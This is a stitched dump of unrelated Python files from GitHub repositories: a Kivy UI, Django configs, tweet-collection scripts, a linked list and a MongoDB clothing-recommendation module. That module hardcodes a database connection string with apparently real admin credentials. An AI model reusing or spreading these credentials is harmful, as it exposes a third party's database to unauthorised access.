tagsgrid.add_widget(Tag(tag_text = \"Tag2\", size_hint_y = None, height = dp(24)))\n tagsgrid.add_widget(Tag(tag_text = \"Tag3\", size_hint_y = None, height = dp(24)))\n tagsgrid.add_widget(Tag(tag_text = \"Tag4\", size_hint_y = None, height = dp(24)))\n tagsgrid.add_widget(Widget())\n\n grid = GridLayout(cols = 1, opacity = 0)\n grid.add_widget(Widget(size_hint_y = None, height = dp(16)))\n grid.add_widget(Label(text = \"[size=24][color=#000000]Nueva Receta\", markup = True, size_hint_y = None, height = dp(24)))\n grid.add_widget(Widget(size_hint_y = None, height = dp(8)));grid.add_widget(tagsgrid)\n grid.add_widget(facecanvas)\n grid.add_widget(Widget(size_hint_y = None, height = dp(8)));grid.add_widget(container);grid.add_widget(Widget(size_hint_y = None, height = dp(8)))\n \n grid.add_widget(Label(text = \"[size=16][color=#000000]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\\n \\n.\\n.\\n.\\n.\\n \\n.\\n.\\n.\\n.\\n.\",text_size = (Window.width*.8, dp(64*4)), halign = 'justify', valign = 'top', markup = True, size_hint_y = None, height = dp(64*4)))\n \n \n \n \n child.pizzarra.add_widget(grid)\n child.add_widget(child.pizzarra)\n child.newcanvas.canvas.clear()\n with child.newcanvas.canvas:\n Color(child.backcolor[0],child.backcolor[1],child.backcolor[2],child.backcolor[3])\n Rectangle(size = (Window.width, Window.height), group = \"color\")\n \n facecanvas.canvas.clear()\n with facecanvas.canvas:\n Color(.89,.89,.89,1)\n Ellipse(size = (64*1.5,64*1.5), pos = (Window.width/2 - 32*1.5, 8))\n \n for children in BottomScroll.children[0].children:\n children.bind(on_release = lambda x: child.switch())\n children.bind(on_release = lambda x: BottomNav.switch())\n print (children)\n \n child.grid = grid\n \n def say_hello(child,*args): print (\"hola\")\n def on_backcolor(child,*args):\n child.newcanvas.canvas.remove_group(\"color\")\n with child.newcanvas.canvas:\n Color(child.backcolor[0],child.backcolor[1],child.backcolor[2],child.backcolor[3])\n Rectangle(size = (Window.width, Window.height), group = \"color\")\n \n \n def switch(child):\n if child.opened == True: \n child.close()\n child.opened = False\n elif child.opened == False: \n child.open()\n child.opened = True\n \n print (child.opened)\n def open(child):\n Animation(height = Window.height , d = .5 , t 
='out_quart').start(child.space)\n Animation(pos_hint = {'y':0} , d = .5 , t ='out_cubic').start(child)\n Animation(backcolor = [1,1,1,1] , d = .5 , t ='out_cubic').start(child)\n Animation(opacity = .54 , d = .25 , t ='out_cubic').start(child.parent.children[-1])\n (Animation(opacity = 0 , d = .25 , t ='out_cubic')+Animation(opacity = 1 , d = .5 , t ='out_cubic')).start(child.grid)\n \n def close(child):\n Animation(height = Window.height - dp(64) , d = .5 , t ='out_quart').start(child.space)\n Animation(pos_hint = {'y':-1} , d = .5 , t ='out_quart').start(child)\n Animation(backcolor = [.11,.11,.11,1] , d = .5 , t ='out_cubic').start(child)\n Animation(opacity = 1 , d = .5 , t ='out_cubic').start(child.parent.children[-1])\n \n (Animation(opacity = 0 , d = .5 , t ='out_cubic')).start(child.grid)\n \n \n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n with this.canvas:\n Rectangle(size = Window.size, texture = Gradient.vertical((1,1,1,1),(.95,.95,.95,1)))\n \n \n \n Space0 = Widget(size_hint_y = None , height = dp(16))\n Space1 = Widget(size_hint_y = None , height = dp(32-15))\n Space2 = Widget(size_hint_y = None , height = dp(64))\n Space3 = Widget(size_hint_y = None , height = dp(64))\n\n grid = GridLayout(cols = 1);\n keyboard = Keyboard(y = dp(64+16))\n layer1 = Layer1()\n this.layer2 = this.Layer2()\n this.add_widget(grid); this.add_widget(keyboard); this.add_widget(layer1); this.add_widget(this.layer2)\n \n def build(buildable = True):\n this.display = Display()\n this.display.bind(on_release = lambda x: keyboard.switch()) \n this.display.bind(on_release = lambda x: layer1.switchtypestate()) \n \n grid.add_widget(TopChooser());\n grid.add_widget(Space2);\n grid.add_widget(this.display);\n grid.add_widget(Space0);\n grid.add_widget(LyricsDisplay());\n grid.add_widget(Space1);\n grid.add_widget(DisplayMenu());\n grid.add_widget(Widget())\n grid.add_widget(Widget())\n grid.add_widget(Space3);\n \n build()\n \n def shake(this,*args):\n this.CurrentAnimation = Animation(y = -4 , d = .25/2 , t = 'in_back') + Animation(y = 0 , d = .25/2 , t = 'out_back')\n this.CurrentAnimation.start(this.children[-1])\n \n \n \n \n \n\n \n \n \n\n \n \n \n \n ","repo_name":"SotoArmando/doc-pythonkivy","sub_path":"Python 3 CodiCookingTimer/docs/MainActivitie/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":29353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18971917110","text":"import unittest\nfrom tower import TowerBuilder, Tangent, DeadEnd\n\nclass Test_Tower_Build(unittest.TestCase):\n def test_tower_build(self):\n t = TowerBuilder.createTower(Tangent, 1, 'short')\n expected = 1\n self.assertEqual(t.tower_number, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cullinap/eldorado","sub_path":"src/test_tower.py","file_name":"test_tower.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70870631453","text":"from drf_spectacular.views import SpectacularAPIView, SpectacularSwaggerView\nfrom django.urls import path\nfrom . 
import views\n\napp_name = 'movies'\n\nurlpatterns = [\n    # list of all movies\n    path('', views.movies_list),\n    # detail of a single movie\n    path('/', views.movie_detail),\n    # list of movies by genre\n    path(\"/genres/\", views.movies_genre),\n    # optional\n    path('swagger/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n    # search\n    path('searchpage//', views.search_post, name='search_post'),\n]\n","repo_name":"iamkijun/MovieProjectSsafy","sub_path":"back-server/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23383917831","text":"# general libraries used\r\nimport sys\r\nimport pprint\r\nimport json\r\nimport re\r\nimport os\r\nimport shutil\r\nimport codecs\r\nimport time\r\n\r\n# specific libraries used\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tweepy\r\nfrom tweepy import *\r\nimport sqlite3\r\n\r\n# including the SMaSSD support files\r\nsys.path.append(\"../Classes/\")\r\nsys.path.append(\"..\")\r\nfrom smassd_functions import *\r\nfrom my_settings import *\r\n\r\n#########################################\r\n# MAIN CODE FOLLOWS\r\n#########################################\r\n\r\n# Variable definitions\r\ninputDB = \"data/data.db\"\r\noutputCSV = \"output_grid.csv\"\r\ncolumns = ['grid_lat','grid_lon','total']\r\noutput = []\r\noutput_hash = {}\r\n\r\nconn = sqlite3.connect(\"data/data.db\")\r\nc = conn.cursor()\r\nfor r in c.execute(\"\"\"SELECT lat,lon,p.lat_1,p.lon_1,p.lat_2,p.lon_2\r\n                      FROM tweets t, places p where t.place_id=p.id\"\"\"):\r\n    grid_lat = None\r\n    grid_lon = None\r\n    if r[0] and r[1]:\r\n        grid_lat = int(r[0] + 0.5)\r\n        grid_lon = int(r[1] + 0.5)\r\n    elif r[2]:\r\n        if abs(r[4]-r[2]) < 2 and abs(r[5]-r[3]) < 2:\r\n            grid_lat = int(((r[2] + r[4]) / 2) + 0.5)\r\n            grid_lon = int(((r[3] + r[5]) / 2) + 0.5)\r\n\r\n    if grid_lat is not None:\r\n        key = str(grid_lat) + \"_\" + str(grid_lon)\r\n        if key in output_hash:\r\n            output_hash[key] += 1\r\n        else:\r\n            output_hash[key] = 1\r\n\r\nfor key in output_hash:\r\n    (grid_lat, grid_lon) = key.split(\"_\")\r\n    ret = {\r\n        'grid_lat': grid_lat,\r\n        'grid_lon': grid_lon,\r\n        'total': output_hash[key]\r\n    }\r\n    output.append(ret)\r\n\r\noutput_pd = pd.DataFrame(output)\r\noutput_pd.to_csv(outputCSV, index=False)\r\n","repo_name":"slwilson4/smassd","sub_path":"04-Geocodes/export_grid.py","file_name":"export_grid.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"32337685050","text":"import tweepy\n\nAPI_KEY = \"YOUR_API_KEY\"\nAPI_SECRET = \"YOUR_API_SECRET\"\nACCESS_TOKEN = \"YOUR_ACCESS_TOKEN\"\nACCESS_TOKEN_SECRET = \"YOUR_ACCESS_TOKEN_SECRET\"\n\n\nclass MyStreamListener(tweepy.StreamListener):\n    def on_status(self, status):\n        f = open('messages.txt', 'a')\n        f.write(\"@%s, message number %s\\n %s\\n\"\n                % (status.author.screen_name, status.id_str,\n                   status.text))\n        f.close()\n        print(\"@%s, message number %s\\n %s\\n\"\n              % (status.author.screen_name, status.id_str,\n                 status.text))\n\n    def on_error(self, status_code):\n        if status_code == 420:\n            return False\n\n    def monitoring_tweets(query, api):\n        GEOBOX_SAMARA_BIG = [48.9700523344, 52.7652295668, 50.7251182524, 53.6648329274]\n        myStreamListener = MyStreamListener()\n        myStream = tweepy.Stream(auth=api.auth,\n                                 listener=myStreamListener)\n        myStream.filter(locations=GEOBOX_SAMARA_BIG)\n\n    def task3_part3(self):\n        query = [\" \"]\n        while True:\n
try:\n auth = tweepy.OAuthHandler(API_KEY,\n API_SECRET)\n auth.set_access_token(ACCESS_TOKEN,\n ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth)\n MyStreamListener.monitoring_tweets(query, api)\n except Exception as error_msg: \\\n print(error_msg)","repo_name":"ArtemB98/SNA_LAB1","sub_path":"MyStreamListener.py","file_name":"MyStreamListener.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29989019057","text":"\ndef random(lst):\n B=[]\n for i in range(65535):\n if (i*lst[0]+1)%65535==lst[1]:\n B.append(i)\n if len(B)==1:\n return (B[0]*lst[1]+1)%65535\n else:\n return None\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"hM9eDtYLEX8GnuhFZ_9.py","file_name":"hM9eDtYLEX8GnuhFZ_9.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3822587534","text":"class LinkedListNode:\n def __init__(self):\n self.content = None\n self.id = -1\n self.next = None\n self.prev = None\n\n def set_id(self, id):\n self.id = id\n\n\nclass LinkedList:\n def __init__(self, maxlen=-1):\n '''\n initialization of the linkedlist, head does not contain any element, but head contains last element\n :return:\n '''\n self.head = LinkedListNode()\n self.tail = None\n self.size = 0\n self.currentNode = self.head\n # self.max_size = maxlen\n\n def insertAtTail(self, content, **kargs):\n node = LinkedListNode()\n node.content = content\n if 'id' in kargs:\n node.id = kargs['id']\n node.next = None\n if self.tail:\n # the list is not empty\n node.prev = self.tail\n self.tail.next = node\n else:\n self.head.next = node\n node.prev = self.head\n self.tail = node\n self.size += 1\n\n # if self.max_size!=-1 and self.size>self.max_size:\n # self.removeFromTail()\n\n return node\n\n def insertNodeAtTail(self, node):\n node.next = None\n if self.tail:\n # the list is not empty\n node.prev = self.tail\n self.tail.next = node\n else:\n self.head.next = node\n node.prev = self.head\n self.tail = node\n self.size += 1\n\n return node\n\n def insertAtHead(self, content, **kargs):\n node = LinkedListNode()\n node.content = content\n if 'id' in kargs:\n node.id = kargs['id']\n node.next = self.head.next\n if self.head.next:\n self.head.next.prev = node\n else:\n self.tail = node\n self.head.next = node\n node.prev = self.head\n self.size += 1\n return node\n\n def removeFromTail(self):\n tail = self.tail\n self.tail.prev.next = None\n temp = self.tail.prev\n self.tail.prev = None\n self.tail = temp\n self.size -= 1\n return tail.content\n\n def removeFromHead(self):\n if not self.head.next:\n # no node in the list\n raise RuntimeError(\"there is no element in the list, cannot removeFromHead\")\n headContent = self.head.next.content\n temp = self.head.next.next\n if temp:\n # more than one element in the original list\n self.head.next.prev = None\n self.head.next.next = None\n self.head.next = temp\n temp.prev = self.head\n else:\n # there is only one element in the original list, after remove, there will be no element\n del self.head.next\n self.head.next = None\n self.tail = None\n self.size -= 1\n return headContent\n\n def moveNodeToHead(self, node):\n if self.head.next != node:\n node.prev.next = node.next\n if node.next:\n node.next.prev = node.prev\n else:\n self.tail = node.prev\n\n node.next = self.head.next\n self.head.next.prev = node\n self.head.next = node\n node.prev = self.head\n\n def removeNode(self, 
node):\n node.prev.next = node.next\n if self.tail == node:\n self.tail = node.prev\n else:\n node.next.prev = node.prev\n self.size -= 1\n return node\n\n def moveNodeToTail(self, node):\n if self.tail != node:\n node.prev.next = node.next\n node.next.prev = node.prev\n node.prev = self.tail\n self.tail.next = node\n node.next = None\n self.tail = node\n\n def set_node_id(self, node, id):\n node.id = id\n\n def getHeadContent(self):\n return self.head.next.content\n\n def getTailContent(self):\n return self.tail.content\n\n def __iter__(self):\n self.currentNode = self.head\n return self\n\n def next(self):\n return self.__next__()\n\n def __next__(self): # Python 3\n if self.currentNode.next == None:\n # self.currentNode = self.head\n raise StopIteration\n else:\n self.currentNode = self.currentNode.next\n return self.currentNode\n\n def __repr__(self):\n return \"linked list\"\n","repo_name":"Shureed/mimircache","sub_path":"mimircache/utils/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"41521802253","text":"from django.contrib import admin\nfrom .models import Product, Order, Basket, Address\n\n\nadmin.site.site_header = 'Shop Dashboard'\n\n\nclass ProductAdmin (admin.ModelAdmin):\n list_display = ('name', 'price', 'stock',\n 'active')\n search_fields = ('name',)\n list_filter = ('active',)\n ordering = ['name']\n actions = ['make_active', 'make_inactive']\n\n def make_active(self, request, queryset):\n rows_updated = queryset.update(active=True)\n if rows_updated == 1:\n message_bit = \"1 product was\"\n else:\n message_bit = \"%s products were\" % rows_updated\n self.message_user(request, \"%s successfully activated.\" % message_bit)\n make_active.short_description = \"Activate products\"\n\n def make_inactive(self, request, queryset):\n rows_updated = queryset.update(active=False)\n if rows_updated == 1:\n message_bit = \"1 product was\"\n else:\n message_bit = \"%s products were\" % rows_updated\n self.message_user(request, \"%s successfully deactived.\" % message_bit)\n make_inactive.short_description = \"Deactivate products\"\n\n\nclass OrderAdmin (admin.ModelAdmin):\n\n list_display = ('order_ref', 'date_time', 'total')\n search_fields = ('order_ref',)\n list_filter = ('date_time',)\n date_hierarchy = 'date_time'\n\n\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(Address)\nadmin.site.register(Order, OrderAdmin)\nadmin.site.register(Basket)\n","repo_name":"AnfalHussain/shop.api","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36568226530","text":"def run():\r\n n = int(input())\r\n a = [int(i) for i in input().split()]\r\n # res = (max(a) - min(a) + 1) - n\r\n count = 0\r\n # s = list(range(min(a),max(a)+1))\r\n # res = len(s) - len(a)\r\n for i in range(min(a),max(a)+1):\r\n if i not in a:\r\n count += 1\r\n print(count)\r\n\r\ndef main():\r\n t = int(input())\r\n for i in range(t):\r\n run()\r\nmain()","repo_name":"HieuAnh87/Python_ptit","sub_path":"Danh Sách/QuanTrong/DienSo.py","file_name":"DienSo.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"69869019612","text":"from pymongo import MongoClient\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics.pairwise 
import cosine_similarity\nfrom sklearn.decomposition import TruncatedSVD\n\nmongo_url = \"mongodb://admin:ssafit@ssafit.site:8975/?authSource=admin&readPreference=primary&appname=MongoDB%20Compass&directConnection=true&ssl=false\"\n\nclient = MongoClient(mongo_url)\ndb = client['ssafit']\n\ndef cloth_helper(cloth):\n context = {\n 'newClothId': int(cloth['newClothId']),\n 'clothId': cloth['clothId'],\n 'clothName': cloth['clothName'],\n 'brand': cloth['brand'],\n 'clothImg': cloth['clothImg'],\n 'clothPrice': cloth['clothPrice'],\n 'goodsSize': cloth['goodsSize'],\n }\n return context\n\ndef get_cloth_meta(what: int):\n clothes = db.cloth_meta.find({'what': what})\n clothes = list(clothes)\n return clothes\n\ndef get_user_meta(what: int, userId: int): \n users = db.user_meta.find({'what': what})\n users = list(users)\n return users\n\ndef get_size_user_info(userId, largecategory):\n users = set()\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n exist = False\n for i in range(10):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], 'userHeight': {'$in': list(range(user['userHeight']-i, user['userHeight']+i))}, 'userWeight': {'$in': list(range(user['userWeight']-i, user['userWeight']+i))}}},{'$sample': {'size':1}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\ndef get_color_user_info(userId, largecategory):\n users = set()\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n color_list = []\n color_exist = False\n for idx, col in enumerate(user):\n if col=='colorWhite':\n color_list.append([col, user[col]])\n color_exist = True\n elif color_exist and col!='colorOthers' and 'color' in col:\n color_list.append([col, user[col]])\n elif col=='colorOthers':\n color_list.append([col, user[col]])\n break\n color_list = sorted(color_list, key=lambda x: x[1], reverse=True)\n color_li = []\n for i in range(0, 3):\n color_li.append(color_list[i][0])\n exist = False\n for i in np.arange(0.1, 1.1, 0.1):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], color_li[0]: {\"$gte\": user[color_li[0]]-i, \"$lte\": user[color_li[0]]+i},color_li[1]: {\"$gte\": user[color_li[1]]-i, \"$lte\": user[color_li[1]]+i},color_li[2]: {\"$gte\": user[color_li[2]]-i, \"$lte\": user[color_li[2]]+i}}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\ndef get_style_user_info(userId, largecategory):\n users = set()\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n exist = False\n for i in range(0, 4, 1):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], 'size': {\"$gte\": user['size']-i, \"$lte\": user['size']+i}, 'bright': {\"$gte\": user['bright']-i, \"$lte\": user['bright']+i}, 'color': {\"$gte\": user['color']-i, \"$lte\": user['color']+i}, 'thickness': {\"$gte\": user['thickness']-i, \"$lte\": user['thickness']+i}}},{'$sample': {'size':1}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\n\ndef get_category_user_info(userId, largecategory):\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n users = set()\n if largecategory == 1:\n category_list = []\n for idx, cat in enumerate(user):\n if 'smallCategory' in cat:\n 
category_list.append([cat, user[cat]])\n category_list = sorted(category_list, key=lambda x: x[1], reverse=True)\n category_li = []\n for i in range(0, 3):\n category_li.append(category_list[i][0])\n elif largecategory == 2:\n category_list = []\n for idx, cat in enumerate(user):\n if 'smallCategory' in cat:\n category_list.append([cat, user[cat]])\n category_list = sorted(category_list, key=lambda x: x[1], reverse=True)\n category_li = []\n for i in range(0, 3):\n category_li.append(category_list[i][0])\n elif largecategory == 3:\n category_list = []\n for idx, cat in enumerate(user):\n if 'smallCategory' in cat:\n category_list.append([cat, user[cat]])\n category_list = sorted(category_list, key=lambda x: x[1], reverse=True)\n category_li = []\n for i in range(0, 3):\n category_li.append(category_list[i][0])\n elif largecategory == 4:\n category_li = ['smallCategoryMinidress', 'smallCategoryMidi', 'smallCategoryMaxidress']\n elif largecategory == 5:\n category_li = ['smallCategoryMiniskirt', 'smallCategoryMidi', 'smallCategoryLongskirt']\n exist = False\n for i in np.arange(0.1, 1, 0.1):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], category_li[0]: {\"$gte\": user[category_li[0]]-i, \"$lte\": user[category_li[0]]+i},category_li[1]: {\"$gte\": user[category_li[1]]-i, \"$lte\": user[category_li[1]]+i},category_li[2]: {\"$gte\": user[category_li[2]]-i, \"$lte\": user[category_li[2]]+i}}},{'$sample': {'size':1}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\n\ndef get_cloth(idList):\n if type(idList) == int:\n cloth = db.cloth.find_one({'newClothId': int(idList)}, {'_id': 0})\n return cloth\n else:\n clothes = []\n for cloth_id in idList:\n cloth = db.cloth.find_one({'newClothId': int(cloth_id)}, {'_id': 0})\n clothes.append(cloth_helper(cloth))\n return clothes\n \ndef get_user_gender(userId):\n user = db.user_ssafit.find_one({'userId': int(userId)})\n return user['userMale']\n\ndef get_cloth_gender(newClothId):\n user = db.cloth.find_one({'newClothId': int(newClothId)})\n return user['clothMale']\n\ndef get_user_height_weight(userId):\n user = db.user_ssafit.find_one({'userId': int(userId)})\n result = [user['userHeight'], user['userWeight']]\n return result\n\ndef get_cloth_height_weight(newClothId):\n cloth = db.cloth.find_one({'newClothId': int(newClothId)})\n result = [cloth['userHeight'], cloth['userWeight']]\n return result\n\ndef get_codi(codiTPO):\n codis = []\n for codi in db.codi.aggregate([{'$project': {\"_id\": 0}}, {'$match':{f'{codiTPO}': int(1)}},{'$sample': {'size':20}}]):\n codis.append(codi)\n return codis\n\n\ndef get_codi_detail(codiId):\n codi = db.codi.find_one({'codiId': int(codiId)}, {'_id': 0})\n return codi\n\n\ndef get_reviews(newClothId):\n reviews = []\n for review in db.review.aggregate([{'$project': {\"_id\": 0}}, {'$match': {'newGoodsNo': int(newClothId)}}, {'$sort': {'date': -1}}]):\n reviews.append(review)\n return reviews\n\ndef get_img_reviews(newClothId: int, userId: int):\n review_list = []\n user = db.user_ssafit.find_one({'userId': userId}, {'_id': 0})\n for review in db.review.aggregate([{'$match': {'newGoodsNo': int(newClothId), 'reviewStyle': 1}}]):\n review_list.append([review['userHeight'], review['userWeight'], review['reviewId']])\n for i in range(len(review_list)):\n review_list[i][0] = review_list[i][0] - user['userHeight']\n review_list[i][1] = review_list[i][1] - user['userWeight']\n review_list = sorted(review_list, 
key=lambda x: x[0]+x[1])\n re_list = []\n for j in range(len(review_list)):\n if j == 10:\n break\n re_list.append(review_list[j][2])\n reviews = []\n for i in re_list:\n reviews.append(db.review.find_one({\"reviewId\": i}, {\"_id\": 0}))\n return reviews\n\n# def get_brand_clothes(newClothId, userId):\n# cloth = db.cloth.find_one({'newClothId': newClothId})\n# user = db.user_ssafit.find_one({'userId': int(userId)})\n# brand_list = []\n# goods_id = set()\n# for brand in db.cloth.aggregate([{'$match': {'brand': cloth['brand']}}]):\n# if brand['clothId'] not in goods_id:\n# brand_list.append([brand['userHeight'], brand['userWeight'], brand['clothReviewCnt'], brand['newClothId']])\n# goods_id.add(brand['clothId'])\n# for i in range(len(brand_list)):\n# brand_list[i][0] = brand_list[i][0] - user['userHeight']\n# brand_list[i][1] = brand_list[i][1] - user['userWeight']\n# brand_list = sorted(brand_list, key=lambda x: (x[0]+x[1], x[2]))\n# br_list = []\n# for j in range(len(brand_list)):\n# if j == 6:\n# break\n# br_list.append(brand_list[j][3])\n# brands = []\n# for i in br_list:\n# brands.append(db.cloth.find_one({\"newClothId\": i}, {\"_id\": 0}))\n# return brands\n\ndef get_brand_clothes(newClothId: int):\n cloth = db.cloth.find_one({'newClothId': newClothId})\n if cloth['largeCategory']==1 or cloth['largeCategory']==2 or cloth['largeCategory']==3:\n transaction = db.transaction.find({'shopCnt': {'$gt': 1}, 'brand': cloth['brand']}, {'_id': 0, 'largecategory': 0})\n else:\n transaction = db.transaction.find({'brand': cloth['brand']}, {'_id': 0, 'largecategory': 0})\n transaction = list(transaction)\n transaction = pd.DataFrame(transaction)\n if 10 <= len(transaction):\n if len(transaction) >= 1000:\n a = transaction[transaction.newClothId==newClothId]\n transaction = transaction.sample(n=1000)\n transaction = pd.concat([transaction, a])\n transaction = transaction.drop_duplicates(['userId', 'newClothId'])\n trans = transaction.pivot_table(index='newClothId', columns='userId', values='shopCnt')\n trans.fillna(0, inplace=True)\n SVD = TruncatedSVD(n_components=10)\n SVD_matrix = SVD.fit_transform(trans)\n corr = np.corrcoef(SVD_matrix)\n corr = pd.DataFrame(data=corr, index=trans.index, columns=trans.index)\n corr_list = corr[cloth['newClothId']].sort_values(ascending=False)[:50].index\n else:\n corr_list = list(transaction.newClothId)\n result = []\n sub = set()\n sub.add(cloth['clothId'])\n cnt = 0\n for clothId in corr_list:\n sub_cloth = db.cloth.find_one({'newClothId': clothId}, {'_id': 0})\n if cnt == 0:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n elif cnt != 0 and sub_cloth['clothId'] not in sub:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n if cnt == 6:\n break\n return result\n\ndef get_similar_clothes(newClothId: int):\n cloth = db.cloth.find_one({'newClothId': newClothId})\n if cloth['largeCategory']==1 or cloth['largeCategory']==2 or cloth['largeCategory']==3:\n transaction = db.transaction.find({'shopCnt': {'$gt': 1}, 'smallCategoryName': cloth['smallCategoryName'], 'colorName': cloth['colorName']}, {'_id': 0, 'largecategory': 0})\n else:\n transaction = db.transaction.find({'smallCategoryName': cloth['smallCategoryName'], 'colorName': cloth['colorName']}, {'_id': 0, 'largecategory': 0})\n transaction = list(transaction)\n transaction = pd.DataFrame(transaction)\n if len(transaction) >= 10:\n if len(transaction) >= 1000:\n a = transaction[transaction.newClothId==newClothId]\n transaction = transaction.sample(n=1000)\n 
transaction = pd.concat([transaction, a])\n transaction = transaction.drop_duplicates(['userId', 'newClothId'])\n trans = transaction.pivot(index='newClothId', columns='userId', values='shopCnt')\n trans.fillna(0, inplace=True)\n SVD = TruncatedSVD(n_components=10)\n SVD_matrix = SVD.fit_transform(trans)\n corr = np.corrcoef(SVD_matrix)\n corr = pd.DataFrame(data=corr, index=trans.index, columns=trans.index)\n corr_list = corr[cloth['newClothId']].sort_values(ascending=False)[1:50].index\n else:\n corr_list = list(transaction.newClothId)\n result = []\n sub = set()\n sub.add(cloth['clothId'])\n cnt = 0\n for clothId in corr_list:\n sub_cloth = db.cloth.find_one({'newClothId': clothId}, {'_id': 0})\n if cnt == 0:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n else:\n if sub_cloth['clothId'] not in sub:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n if cnt == 6:\n break\n return result\n\n\ndef get_cloth_by_user_info(clothId, userId):\n user = db.user_ssafit.find_one({'userId':int(userId)})\n newClothId = ''\n exist = False\n \n for i in range(30):\n for cloth in db.cloth.aggregate([{'$project': {\"_id\": 0}},{'$match': {'clothId': int(clothId), 'userHeight': {'$in': list(range(user['userHeight']-i, user['userHeight']+i))}, 'userWeight': {'$in': list(range(user['userWeight']-i, user['userWeight']+i))}}}]):\n newClothId = cloth['newClothId']\n if newClothId:\n exist = True\n break\n if exist:\n break\n return newClothId\n\ndef change_user_info(userId, newClothId, num):\n cloth = get_cloth(newClothId)\n largecategory = cloth['largeCategory']\n smallCategorySelect = ''\n style = ['size', 'bright', 'color', 'thickness']\n colorSelect = ''\n for idx, col in enumerate(cloth):\n if 'smallCategory' in col and cloth[col] == 1:\n smallCategorySelect = col\n elif col != 'color' and 'color' in col and cloth[col] == 1:\n colorSelect = col\n \n col_list = ['size', 'bright', 'color', 'thickness', 'colorWhite', \n 'colorGrey', 'colorBlack', 'colorRed', 'colorPink', 'colorOrange', 'colorIvory', 'colorYellow',\n 'colorGreen', 'colorBlue', 'colorPurple', 'colorBrown', 'colorBeige', 'colorJean', 'colorPattern', 'colorOthers', \n 'smallCategoryHalfshort', 'smallCategoryShirt', 'smallCategoryCollar',\n 'smallCategoryHoody', 'smallCategorySweatshirt', 'smallCategoryKnit',\n 'smallCategoryLong', 'smallCategoryShort', 'smallCategoryOthers',\n 'smallCategoryHoodie', 'smallCategoryBlouson', 'smallCategoryRiders', 'smallCategoryMustang', \n 'smallCategoryCardigan', 'smallCategoryFleece', 'smallCategoryCoat', 'smallCategoryPaddedcoat', 'smallCategoryVest', 'smallCategoryJacket',\n 'smallCategoryDenimpants', 'smallCategoryCottonpants', 'smallCategorySlacks',\n 'smallCategoryJoggerpants', 'smallCategoryShortpants', 'smallCategoryLeggings', 'smallCategoryJumpsuit',\n 'smallCategoryMinidress', 'smallCategoryMidi', 'smallCategoryMaxidress',\n 'smallCategoryMiniskirt', 'smallCategoryLongskirt']\n\n\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n if num == 1:\n for idx, cat in enumerate(user):\n # 모든 성분 * viewCnt\n if cat in col_list:\n user[cat] *= user['viewCnt']\n if cat == smallCategorySelect:\n user[cat] += 1\n elif cat == colorSelect:\n user[cat] += 1\n elif cat in style:\n user[cat] += cloth[cat]\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n \n # viewCnt += 1\n user['viewCnt'] += 1\n\n for idx, cat in enumerate(user):\n # 모든 성분 / 
